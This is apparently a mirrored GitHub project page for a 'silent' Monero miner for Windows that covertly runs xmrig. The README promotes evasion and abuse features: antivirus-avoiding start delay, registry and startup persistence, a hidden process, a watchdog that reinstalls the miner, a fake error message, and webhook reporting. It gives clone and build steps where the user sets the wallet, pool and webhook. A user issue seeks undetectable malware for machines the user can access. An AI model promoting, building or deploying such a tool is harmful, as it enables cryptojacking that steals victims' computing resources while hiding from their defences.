Git Product home page Git Product logo

silentxmrminer's Introduction

Skar Silent XMR Miner For Windows

A silent monero crypto miner for windows made in c++ that implements xmrig

Features !

  • Custom start delay to avoid av and suspison

  • Add to startup

  • Add to registry for persisance and makes key

  • Hidden window and hidden process

  • Custom installation (in /temp folder)

  • Watchdog to ensure miner isnt delete or closes, redownloads if it isnt mining.

  • Custom miner config

  • Fake error message

  • Discord webhook notify

    Installtion:

    Instructions on how to install SkarSilentMiner

git clone https://github.com/SkarSys/SilentXmrMiner.git

Usage:

Setting up the miner:

  • First open the main.cpp file
  • Next, scroll down intil you see "Veriables To Change"
  • Change whatever you want, make sure to change the xmr address, pool, and discord web hook
  • Build it (x64 release!!)
  • Done!

How it works:

  • Miner: My silent xmr miner uses a precompiled version of XMRIG, it downloads it on the client, installs and adds it to startup then, using your settings (xmr address, pool) it runs xmrig on commands line.
  • Watchdog: the watchdog is very simple, its placed in a simple while loop at the end of the code. The loop checks the running processes using the windows api and if the miner is not found or is deleted, it will then reinstall it and start it with your initial settings.

Conditions:

  • This is a POC and is meant for educational perpuse only! I am not liable for any damage caused by SkarRat and will not be held accountable.

silentxmrminer's People

Contributors

skarsys avatar

Stargazers

 avatar  avatar  avatar  avatar

Watchers

 avatar

silentxmrminer's Issues

Best silent miner

Hello, I’m looking for the best silent miner. I have access to the computers, but antivirus programs detect the software. Is there another method where I could install different malware that isn’t visible?

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.